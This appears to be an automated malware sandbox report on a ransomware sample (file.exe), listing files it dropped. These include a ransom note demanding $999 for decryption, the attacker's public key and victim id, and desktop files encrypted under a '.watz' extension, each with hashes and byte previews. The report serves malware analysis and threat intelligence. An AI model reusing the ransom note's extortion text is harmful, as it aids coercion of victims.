Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}

C:\Users\user\AppData\Local\VirtualStore\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.902166147224844
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNKCzmFRqrs6314kA+GT/kF5M2/kJw3RR:WZHfv0pfNAU5WEYNKCzPs41rDGT0f/kA
MD5:	7B001D9C73C3B729FE5420A889EC8BF7
SHA1:	F92AEE8C47A74B4D10D46C32676BDB7144275D82
SHA-256:	438A09FCDE4472A99996E58B713D2783048B5E6B6E490724652322A00102D657
SHA-512:	3C178717F9775D9C530EE7448CDFB432A0EE930F8A1A650921606CAA01A02B63C7411E9A9C3633CC3A108EEB6E68FD16CA81109A990F4113A0ED74BDAFB46803
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

C:\Users\user\AppData\Local\bowsakkdestx.txt

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	557
Entropy (8bit):	6.017036102656592
Encrypted:	false
SSDEEP:	12:YGJ6838ONrD3LxM8OO+xst1zIBnzmKI15Y1/:YgJ38aX7KAGzm1q
MD5:	C4C2A009303D43379B6505DAE754CB92
SHA1:	FE20E38B05EEC237ED31B5D90115ED3EBA7B89FF
SHA-256:	F0B8EA240CEA32D7AB9FD7E19E8F84B909DB34D44489226196C8830007B878ED
SHA-512:	C9CDFFB3D5A41CAC27B357DC4B983D00EFE37DC9DC786409B9418704E2FDC57AE800E51904F31AC39B736EBC0C02F2E26F6ABEEC67A74D08DCBD6BAC5D5FD697
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}

C:\Users\user\Desktop\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868531837453173
Encrypted:	false
SSDEEP:	24:0RwNxVy3pkmJXpNZPgz8mJlR5pdLrwjm97GIcXdkU6W9jtkNxbD:0UbymmhpNZYQmDLrwjCCIjWtGLD
MD5:	E9A24F74B4715746CF43BC0347955128
SHA1:	2300500CB1CC5B28BE71BF563C82C2D5F8254FE6
SHA-256:	75EF9AC6831DC9EAEAF19E592C3AE42274B43FAC0FACC046089D2B00C2216BF6
SHA-512:	C2E628B73F6710F8304E4C4A3B4606A0C1F6AD099A254533B10C9A573935C21705C09E2FE6DD9A62C176D90A146797B3E28CF0938D1CF6D6EC97557D405BCCF1
Malicious:	false
Preview:	BPMLNOM.c.g).].Z...,c.......Cr.oag......+?.......g."...Q..~.<=S..z...G....!........m..[Q8.;R.7m...=".R..%.1"...........+.....e..z.....8..YH...o.J.s71..EQ.....a..s5A.+.T.B...0..t..Vi.0.$....K.!Z.v;..N.a#`...>."....v.O. ...0...X.x.%...u..ALjD..[.&...fVMbrX8El...a....m.e...."..e...z.D..A..y...2.p..^...m.U6. ....xqq..C...<.mC.FcY....S...{...,<<.....?...M41.u...9.z... .v..7...!.oJ*..l.m.3..N....i%...~..>I@q{d.WH.,G`....jzM?..(.....ex._..#.....)>.G.....{..3.D@_.t.M.....K..eu.X..#....S..s)^FR.g...5..~.nm..y........V..B....f...=.k...t..X.E..}...}YY....G..f.r....\|f.P...........#e...e..<.....NjF#"<e....-.tA)..;&S.5..ga.=...:U...~.%......5......y...u...I&.R..}x...o....v.y.[...,.`..'...oC.\|N...l.#9........5@.,...9.U..z.....Y..O.N.....uF,.^ej&....L.`...>.r.Y$OIu........d.Q....SA..e......6..KO.T....]..=0.....C....R.Z.tO.).....+w.?..v..4\.[.ek.O....L.E.1..-..{ b.._)e)..b.f.!.A..2..D...4Eo..3%....7,..`.....+.......M......<...z..z.\.f..\|.

C:\Users\user\Desktop\BPMLNOBVSB.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868531837453173
Encrypted:	false
SSDEEP:	24:0RwNxVy3pkmJXpNZPgz8mJlR5pdLrwjm97GIcXdkU6W9jtkNxbD:0UbymmhpNZYQmDLrwjCCIjWtGLD
MD5:	E9A24F74B4715746CF43BC0347955128
SHA1:	2300500CB1CC5B28BE71BF563C82C2D5F8254FE6
SHA-256:	75EF9AC6831DC9EAEAF19E592C3AE42274B43FAC0FACC046089D2B00C2216BF6
SHA-512:	C2E628B73F6710F8304E4C4A3B4606A0C1F6AD099A254533B10C9A573935C21705C09E2FE6DD9A62C176D90A146797B3E28CF0938D1CF6D6EC97557D405BCCF1
Malicious:	false
Preview:	BPMLNOM.c.g).].Z...,c.......Cr.oag......+?.......g."...Q..~.<=S..z...G....!........m..[Q8.;R.7m...=".R..%.1"...........+.....e..z.....8..YH...o.J.s71..EQ.....a..s5A.+.T.B...0..t..Vi.0.$....K.!Z.v;..N.a#`...>."....v.O. ...0...X.x.%...u..ALjD..[.&...fVMbrX8El...a....m.e...."..e...z.D..A..y...2.p..^...m.U6. ....xqq..C...<.mC.FcY....S...{...,<<.....?...M41.u...9.z... .v..7...!.oJ*..l.m.3..N....i%...~..>I@q{d.WH.,G`....jzM?..(.....ex._..#.....)>.G.....{..3.D@_.t.M.....K..eu.X..#....S..s)^FR.g...5..~.nm..y........V..B....f...=.k...t..X.E..}...}YY....G..f.r....\|f.P...........#e...e..<.....NjF#"<e....-.tA)..;&S.5..ga.=...:U...~.%......5......y...u...I&.R..}x...o....v.y.[...,.`..'...oC.\|N...l.#9........5@.,...9.U..z.....Y..O.N.....uF,.^ej&....L.`...>.r.Y$OIu........d.Q....SA..e......6..KO.T....]..=0.....C....R.Z.tO.).....+w.?..v..4\.[.ek.O....L.E.1..-..{ b.._)e)..b.f.!.A..2..D...4Eo..3%....7,..`.....+.......M......<...z..z.\.f..\|.

C:\Users\user\Desktop\CURQNKVOIX.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8444391278886005
Encrypted:	false
SSDEEP:	24:6ijDYgk2cc7ECxTMZCx0u7YNJSLLKX4DHHz8Dn8BAReOmTC7CRWRCHBeejuhJ2gO:6igbODx2I0FN8S4Dz8DHnv2eoAmD
MD5:	EBB35ECAE9412BE0615404D131F25FE5
SHA1:	EF6761EB139ABBAC6E033176E13DEB0038B079CA
SHA-256:	7A91734E58799BFD24A5E6E88B81CA919742BE5DE2058BD6EF253443CD0F18E0
SHA-512:	F36FF774E00E569A8717184A2270F72C6763BA05739E3AA3D637BF86F5491A5BB49A31E9298F5F99D37285440F4B4DCF680993E229C4A946BE94D3AA74F71FB5
Malicious:	true
Preview:	CURQN.{V..,;(U....!.^J.Ft.<...3Tn..w+.......0....fb.)...T.G...7.(..r.E.....1.ldip.V$...c....r.#Y......]..@.n:....t@..yDl..3,...M.....x1.....AI..N.....N]..pV.y.P......J...G.....3.6zKv>.........JG.n.g.TD.. 9.OfG.idN..:...Kj.c......}.;.:-..E.WO.....l?L...?.....T.[.._...zSi.E_`..}. ..P..O.....M.F9I)...<...Xy[p.y.}@6...4.{..-..n)..............l%\....q8......t......HN..........a2.0...kb...g%......?...m.xO......a>)n..i........v..gW.x.+..hR?...........;T[....s.A..k0..0........wL.....".KQne.....w=..C..t..fK..zO.w...m..."t.....6.E. ]N....E..a...`\|...!...Z.%..T.l...T...7J.n...ZM-CE)f..'.B.00..o..W.A..+...u..*I....X........A.v.....m...../............<.gcp...fz..T.........jS%Q.....N...F.))a..22...fL.....?..$6Z.Q.A.G.('.rn..V.1...x....c.m.\....7..;...>.X>..L...MQ..e.cG....^..>S.$..oT!+L.CIc .PC....2`.5)k...c ..v....H......e.P..%5E....S...l./...^..:..d.......I._...V'U.G=S.5.J....R..J6.W..e.KeX7...3zr;...P.g.Fo?;nZ4yfv.n.....8..TQx...I..CT..+Y.l....`...

C:\Users\user\Desktop\CURQNKVOIX.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8444391278886005
Encrypted:	false
SSDEEP:	24:6ijDYgk2cc7ECxTMZCx0u7YNJSLLKX4DHHz8Dn8BAReOmTC7CRWRCHBeejuhJ2gO:6igbODx2I0FN8S4Dz8DHnv2eoAmD
MD5:	EBB35ECAE9412BE0615404D131F25FE5
SHA1:	EF6761EB139ABBAC6E033176E13DEB0038B079CA
SHA-256:	7A91734E58799BFD24A5E6E88B81CA919742BE5DE2058BD6EF253443CD0F18E0
SHA-512:	F36FF774E00E569A8717184A2270F72C6763BA05739E3AA3D637BF86F5491A5BB49A31E9298F5F99D37285440F4B4DCF680993E229C4A946BE94D3AA74F71FB5
Malicious:	false
Preview:	CURQN.{V..,;(U....!.^J.Ft.<...3Tn..w+.......0....fb.)...T.G...7.(..r.E.....1.ldip.V$...c....r.#Y......]..@.n:....t@..yDl..3,...M.....x1.....AI..N.....N]..pV.y.P......J...G.....3.6zKv>.........JG.n.g.TD.. 9.OfG.idN..:...Kj.c......}.;.:-..E.WO.....l?L...?.....T.[.._...zSi.E_`..}. ..P..O.....M.F9I)...<...Xy[p.y.}@6...4.{..-..n)..............l%\....q8......t......HN..........a2.0...kb...g%......?...m.xO......a>)n..i........v..gW.x.+..hR?...........;T[....s.A..k0..0........wL.....".KQne.....w=..C..t..fK..zO.w...m..."t.....6.E. ]N....E..a...`\|...!...Z.%..T.l...T...7J.n...ZM-CE)f..'.B.00..o..W.A..+...u..*I....X........A.v.....m...../............<.gcp...fz..T.........jS%Q.....N...F.))a..22...fL.....?..$6Z.Q.A.G.('.rn..V.1...x....c.m.\....7..;...>.X>..L...MQ..e.cG....^..>S.$..oT!+L.CIc .PC....2`.5)k...c ..v....H......e.P..%5E....S...l./...^..:..d.......I._...V'U.G=S.5.J....R..J6.W..e.KeX7...3zr;...P.g.Fo?;nZ4yfv.n.....8..TQx...I..CT..+Y.l....`...

C:\Users\user\Desktop\DVWHKMNFNN.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846544936333135
Encrypted:	false
SSDEEP:	24:Cf8Bsu2s3hzd9H+vpouzXqhyGkqFVNKApUjdMC48gnuDXCdP2Yb6xnMcr+aUuZ+X:s8lXl+rqy47Uj2C48gnuDXCoY25HnZ8D
MD5:	30DBF3A94B7E787F25E83AF589B9B24F
SHA1:	E9BEA1EB23403F8C1416D81D218DE2C779DB5BFF
SHA-256:	77499B9770DD9C7A4DB6A7FF3CA861A3E2F7A3D3AF7B0B72BC81AADE44A19506
SHA-512:	D53846668A4BE0FD89229DE9A2688263965393B2EF66DC4FA20D3E32C24092CB45A47D9FE781342BA3D5978D5AF8746584F226A93B3B5D83428E2431EB7C44D5
Malicious:	false
Preview:	DVWHK&.0\|...D..W.?\|....sH...3[.........A.i.......K.6.\.....R.B.\..P...0.....%.pe..ZDV..T........Z\6z.....>U..b0.WdCmJ.....A~...n.`..@H.y.A<H.{.ZS=s.V#.P...r.0.4..7.r.....s.7...5.].Y......~..v..v7S.V`4" .J9.O..y.`..W....8....$..U....VV. ......0......^.....k..-........m\.6w..\.>.......O..7..."..C...K..,..&5.Z.l}.d.!.Q..u.+. .=.IbO.._...tU.r..hr...D.B:h37.....;N.b".8.....c.=d....+.......jIU.T..J ...';..#.H/..#..WR.a......?(9L.....d.., ./.{.c....;..Y.+.R.Y.......w..(4..~WF......:..t.U.B4."..;............;t....z..Hg\mn.6.^Y...;.+.S.I.\>..pcn....z.?.....^...Y..2.{SzM.lf<].@ 4U.C.\.&Z...O..>.Y]....r..!........Fg8,..p.K0......>^.HP..0u....2.2H.....yE.A.V.L..4..q...4.&=.j.TH.........\|...;84A-".L..5+.d...}..?Hw....0&L..9..I...,.3..{..%L......)..3wz..=._.....~.:..e$D}=.I....S.U..v..fD..4Sz...f....f{k.Q.G.=Z.up.].r?B.#..qq.{.0....g&?.9.-.}a.Qk8.<...7..#.Q..S1.".7..x..1?..C...I........V.j.Q.._...fsCx..W....i..<>.$..........*..D..6^./...

C:\Users\user\Desktop\DVWHKMNFNN.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846544936333135
Encrypted:	false
SSDEEP:	24:Cf8Bsu2s3hzd9H+vpouzXqhyGkqFVNKApUjdMC48gnuDXCdP2Yb6xnMcr+aUuZ+X:s8lXl+rqy47Uj2C48gnuDXCoY25HnZ8D
MD5:	30DBF3A94B7E787F25E83AF589B9B24F
SHA1:	E9BEA1EB23403F8C1416D81D218DE2C779DB5BFF
SHA-256:	77499B9770DD9C7A4DB6A7FF3CA861A3E2F7A3D3AF7B0B72BC81AADE44A19506
SHA-512:	D53846668A4BE0FD89229DE9A2688263965393B2EF66DC4FA20D3E32C24092CB45A47D9FE781342BA3D5978D5AF8746584F226A93B3B5D83428E2431EB7C44D5
Malicious:	false
Preview:	DVWHK&.0\|...D..W.?\|....sH...3[.........A.i.......K.6.\.....R.B.\..P...0.....%.pe..ZDV..T........Z\6z.....>U..b0.WdCmJ.....A~...n.`..@H.y.A<H.{.ZS=s.V#.P...r.0.4..7.r.....s.7...5.].Y......~..v..v7S.V`4" .J9.O..y.`..W....8....$..U....VV. ......0......^.....k..-........m\.6w..\.>.......O..7..."..C...K..,..&5.Z.l}.d.!.Q..u.+. .=.IbO.._...tU.r..hr...D.B:h37.....;N.b".8.....c.=d....+.......jIU.T..J ...';..#.H/..#..WR.a......?(9L.....d.., ./.{.c....;..Y.+.R.Y.......w..(4..~WF......:..t.U.B4."..;............;t....z..Hg\mn.6.^Y...;.+.S.I.\>..pcn....z.?.....^...Y..2.{SzM.lf<].@ 4U.C.\.&Z...O..>.Y]....r..!........Fg8,..p.K0......>^.HP..0u....2.2H.....yE.A.V.L..4..q...4.&=.j.TH.........\|...;84A-".L..5+.d...}..?Hw....0&L..9..I...,.3..{..%L......)..3wz..=._.....~.:..e$D}=.I....S.U..v..fD..4Sz...f....f{k.Q.G.=Z.up.].r?B.#..qq.{.0....g&?.9.-.}a.Qk8.<...7..#.Q..S1.".7..x..1?..C...I........V.j.Q.._...fsCx..W....i..<>.$..........*..D..6^./...

C:\Users\user\Desktop\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848867609572129
Encrypted:	false
SSDEEP:	24:JJIV6ujjOVasEY4SBdock4huV69yOwv/7tp51YPRVOKsNUafkvT/Rj0sPj1m0Ixl:AxHBUdBd/SfOwv/lyPwNrk7/R4sZm0JO
MD5:	322BA80475E8388E56137938D29B6BB1
SHA1:	9C8B4E512A53309BD0131DA14BCEF012BA3A624F
SHA-256:	B1334AF4365465F39FAAB996F79F73ADAB249795AE3F073CABEA213433F1EED2
SHA-512:	93F2E65D9271AC46A4838015771DE71BAFDB9C76956856C0BDC898371C9E18A7D83B9DE7F51A5DAA2B42AF405E23953301BCB7C0B32DCCB86BBC603772380A06
Malicious:	false
Preview:	DVWHK..Z.......@N..M..[\.K..yIb....#_o(.~5.....Y.z.4.vm..,.D..7~?.8..u.d..IaD.H...s<o.cT.P\|....^=...A...,}.^...c.....Nk..@..Tuz<..jm..r..pv...F;@x43C.9..I...r.........$.(..ou.L)~.T .....c."4.8.a'.)...^.F...U.'o..bt./.U.E$h.Q.h..ot0S..P.mNp:.>].j+.a....C.MP.<$.y...."..]\.$m.F..}.^..rGd...\|.C/d...d].-Y...w..I..,....E.;&...`M(./CF..j.$..&..<y;Ox....[&...$...0l..c...L.k-Y......J.O..^J..e..j......5}..kA$..2H4.Z.x..uiF..p-..2.XH4A.W=M.xmb(%.lzK...!k.oe...FK.W$.....'[...;.XVu..E..X.!E.t..o.i~..q.G?iw%[......6....#...t.'..>\........#...B......5..b...V....E...8..6....$YK.....5iU....y..L\|kB.]..Z....u....+.Oz...D.j..'.4I}.L...V&.....UP.W...\".EL..E..b../.r.8..U.j...u+.U..w.]AJ..tS.f..Tq{NK[#...g..,.Y.do...D_..>O.[........z_c@.`.A.#..b..g....rk.4..:>..e.'..OP!.k.X..`2\........c......\.3.G..!.J[j.`.;._..b?G.k.EF=.......\|......{.A\k......./._....i...E(`.(H....]FI....zDl...6...:\..rI.....y...@.2X.....vZ`.O...g4O........3..f...&............>....5g..#!

C:\Users\user\Desktop\DVWHKMNFNN.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848867609572129
Encrypted:	false
SSDEEP:	24:JJIV6ujjOVasEY4SBdock4huV69yOwv/7tp51YPRVOKsNUafkvT/Rj0sPj1m0Ixl:AxHBUdBd/SfOwv/lyPwNrk7/R4sZm0JO
MD5:	322BA80475E8388E56137938D29B6BB1
SHA1:	9C8B4E512A53309BD0131DA14BCEF012BA3A624F
SHA-256:	B1334AF4365465F39FAAB996F79F73ADAB249795AE3F073CABEA213433F1EED2
SHA-512:	93F2E65D9271AC46A4838015771DE71BAFDB9C76956856C0BDC898371C9E18A7D83B9DE7F51A5DAA2B42AF405E23953301BCB7C0B32DCCB86BBC603772380A06
Malicious:	false
Preview:	DVWHK..Z.......@N..M..[\.K..yIb....#_o(.~5.....Y.z.4.vm..,.D..7~?.8..u.d..IaD.H...s<o.cT.P\|....^=...A...,}.^...c.....Nk..@..Tuz<..jm..r..pv...F;@x43C.9..I...r.........$.(..ou.L)~.T .....c."4.8.a'.)...^.F...U.'o..bt./.U.E$h.Q.h..ot0S..P.mNp:.>].j+.a....C.MP.<$.y...."..]\.$m.F..}.^..rGd...\|.C/d...d].-Y...w..I..,....E.;&...`M(./CF..j.$..&..<y;Ox....[&...$...0l..c...L.k-Y......J.O..^J..e..j......5}..kA$..2H4.Z.x..uiF..p-..2.XH4A.W=M.xmb(%.lzK...!k.oe...FK.W$.....'[...;.XVu..E..X.!E.t..o.i~..q.G?iw%[......6....#...t.'..>\........#...B......5..b...V....E...8..6....$YK.....5iU....y..L\|kB.]..Z....u....+.Oz...D.j..'.4I}.L...V&.....UP.W...\".EL..E..b../.r.8..U.j...u+.U..w.]AJ..tS.f..Tq{NK[#...g..,.Y.do...D_..>O.[........z_c@.`.A.#..b..g....rk.4..:>..e.'..OP!.k.X..`2\........c......\.3.G..!.J[j.`.;._..b?G.k.EF=.......\|......{.A\k......./._....i...E(`.(H....]FI....zDl...6...:\..rI.....y...@.2X.....vZ`.O...g4O........3..f...&............>....5g..#!

C:\Users\user\Desktop\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833444882230076
Encrypted:	false
SSDEEP:	24:hxpVkHglu/BtWIsOYKTia3FUJsMd83jp9Cc39nTrixUAvYPEhdPSbD:v7lu/TWIvYrMXMdHcR3iiAhdoD
MD5:	62EE085B2ED1F40101557D51695FCB22
SHA1:	A3AB098B15A2156D604E300CC42AD768C68AFBC2
SHA-256:	618D737C2CD8EC078638F1FBB0826F1ED207095CE2ECDD73204491B987B3A05A
SHA-512:	AD9F7E13340DB60B5C983142703B5BF0F652A6EE6552983A8C0F8CEBC708D106C143F6435CB21E51ACF54CF5364E03343574525E3F51BF1D717D7237C67CC2E4
Malicious:	false
Preview:	DVWHKj.7.l..<..!.Ay....7a#.....'..N....5Fp.9.C....m9.E.oQ2.>....z.y.;..Z....1m...cWcwM..O........H....:.pC..b../.+...T..U.nZ5.y.:.jF.].n...L.K....]Dh.2;>GI....d..9.g>.#....h....`..0`...sQ.-......r..sR..:M...Us..bx_?(..fe...W.......N..30.s..%........v....=.\|..b.H..F.]..L.....V.o...>...2J..\....p\|,..F..D.F.JmG..../..6o.D...b...2.......p,...."h..a.....P......AF....f\..... ..%....j...........g...o.i..vM..7MJc..:G.n.c.5..!.......^?.T.!....s./.U.C..%.v.E...5.@F.o...Z.D...W+..B?.@..Z....}.JiJf.f...~.......Y=.e.....<..].........6_<.p.V...G....`MZ.0.B.P...0...g...d.JF,t..h..j2d4..........A.Z......`o....d.).&...99.....e..k{.#......i..F.B.....E.ig...\|..:.u... 4....49..?B.s..\G..*.......~......:^.NQ.$...b...H.........j.n9.n.Y..."\|.x...s...a..R.....6<.P......".&kjVl....'ph.^.....Y(.%.j....P.._N....P.;..i..9.D....NJ1D8_~....7..L9.........q.l.-..NVy...o{i......wd.sjh]./0..C...>W.o.A.Q......we..v.AI9}.K_.L.-..j.>.5...^.........B.

C:\Users\user\Desktop\DVWHKMNFNN.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833444882230076
Encrypted:	false
SSDEEP:	24:hxpVkHglu/BtWIsOYKTia3FUJsMd83jp9Cc39nTrixUAvYPEhdPSbD:v7lu/TWIvYrMXMdHcR3iiAhdoD
MD5:	62EE085B2ED1F40101557D51695FCB22
SHA1:	A3AB098B15A2156D604E300CC42AD768C68AFBC2
SHA-256:	618D737C2CD8EC078638F1FBB0826F1ED207095CE2ECDD73204491B987B3A05A
SHA-512:	AD9F7E13340DB60B5C983142703B5BF0F652A6EE6552983A8C0F8CEBC708D106C143F6435CB21E51ACF54CF5364E03343574525E3F51BF1D717D7237C67CC2E4
Malicious:	false
Preview:	DVWHKj.7.l..<..!.Ay....7a#.....'..N....5Fp.9.C....m9.E.oQ2.>....z.y.;..Z....1m...cWcwM..O........H....:.pC..b../.+...T..U.nZ5.y.:.jF.].n...L.K....]Dh.2;>GI....d..9.g>.#....h....`..0`...sQ.-......r..sR..:M...Us..bx_?(..fe...W.......N..30.s..%........v....=.\|..b.H..F.]..L.....V.o...>...2J..\....p\|,..F..D.F.JmG..../..6o.D...b...2.......p,...."h..a.....P......AF....f\..... ..%....j...........g...o.i..vM..7MJc..:G.n.c.5..!.......^?.T.!....s./.U.C..%.v.E...5.@F.o...Z.D...W+..B?.@..Z....}.JiJf.f...~.......Y=.e.....<..].........6_<.p.V...G....`MZ.0.B.P...0...g...d.JF,t..h..j2d4..........A.Z......`o....d.).&...99.....e..k{.#......i..F.B.....E.ig...\|..:.u... 4....49..?B.s..\G..*.......~......:^.NQ.$...b...H.........j.n9.n.Y..."\|.x...s...a..R.....6<.P......".&kjVl....'ph.^.....Y(.%.j....P.._N....P.;..i..9.D....NJ1D8_~....7..L9.........q.l.-..NVy...o{i......wd.sjh]./0..C...>W.o.A.Q......we..v.AI9}.K_.L.-..j.>.5...^.........B.

C:\Users\user\Desktop\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842832322179223
Encrypted:	false
SSDEEP:	24:hEwxWvr1qDX3nJ+x2+EoT1L4zaZHBUEVNaZLWFt+jggDbD:awxWvrqOXPhAaZH5aRQt+jggXD
MD5:	B43E6C23B4A031C863039C980FFE0C7E
SHA1:	A8F2D0FF14B4DCA0C808606BE22FBFCD0551B726
SHA-256:	B101CE4E757FDBC257B994EDC31AAE823C4A539F10E5C0ADD1F51E63C17A52B5
SHA-512:	154E26C2D590242536D5E249D2D28AA1D853FC352C27F00FF54B55EAE3A9F91F93AB3EE082FFE0B1A6FB0156AD45ECED620E83685D164CD80D842EC284419193
Malicious:	false
Preview:	HTAGV..{.o`.5..1...T.._......K..ES.`..<)......Y.[WG....i.R.\D0..+.\|.K.D{F.U.`.?..\...>.g.....lZ.\|...YJ=C\.(.j.G/3B..'.0Ug......mj....v.l.w{....G....L....e~..&..6.....eN.........A...K\..........2EH..".2.JPqbF..}.D...Sj:.KU..W..4..+..U..Q.}.7$.Bs..(...;i.5J.\|<.g...........V..Y/......f.T...j..9(.d>....w....H.....]K@A.H ..$.T...$bB..G.......$0.....Y.w8. ...}...l.!^D..[..e..'.[.h.<..Y.d....}.C....v;>..._..K.%s..`%..?'R.e.......r)...,.#Q).....E....v2u..i......fG...$5....P'...H../.<k.....030.....r..[h..z.....JA...hq....u.3..".k.~.......6....rH.,..zl.S...6u\.R.\$.`.r]..iA\|.=6S...t=......Bo...]..qo.e..P......k...B..=^...&/..J+..%~......{{.....?.6&....].F#n....1(...d...I5......u..Nj@c~.ug.h...3.$O.../.....)....`..r....7..<rp1.[."....V.Q]...q..]Z.^.\|..?..!.......a....r.Ai..Y.?..dBh8.!b.8G.).,8..,$~l&.Q.t..)....sbH........X~+-.....+VW.j.5.O......Q.\..0A]z$?..N..H........7.-.t..].......O.....g.......y...6<.f_F..,.\..<.h.~.......)..]I...{;..s

C:\Users\user\Desktop\HTAGVDFUIE.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842832322179223
Encrypted:	false
SSDEEP:	24:hEwxWvr1qDX3nJ+x2+EoT1L4zaZHBUEVNaZLWFt+jggDbD:awxWvrqOXPhAaZH5aRQt+jggXD
MD5:	B43E6C23B4A031C863039C980FFE0C7E
SHA1:	A8F2D0FF14B4DCA0C808606BE22FBFCD0551B726
SHA-256:	B101CE4E757FDBC257B994EDC31AAE823C4A539F10E5C0ADD1F51E63C17A52B5
SHA-512:	154E26C2D590242536D5E249D2D28AA1D853FC352C27F00FF54B55EAE3A9F91F93AB3EE082FFE0B1A6FB0156AD45ECED620E83685D164CD80D842EC284419193
Malicious:	false
Preview:	HTAGV..{.o`.5..1...T.._......K..ES.`..<)......Y.[WG....i.R.\D0..+.\|.K.D{F.U.`.?..\...>.g.....lZ.\|...YJ=C\.(.j.G/3B..'.0Ug......mj....v.l.w{....G....L....e~..&..6.....eN.........A...K\..........2EH..".2.JPqbF..}.D...Sj:.KU..W..4..+..U..Q.}.7$.Bs..(...;i.5J.\|<.g...........V..Y/......f.T...j..9(.d>....w....H.....]K@A.H ..$.T...$bB..G.......$0.....Y.w8. 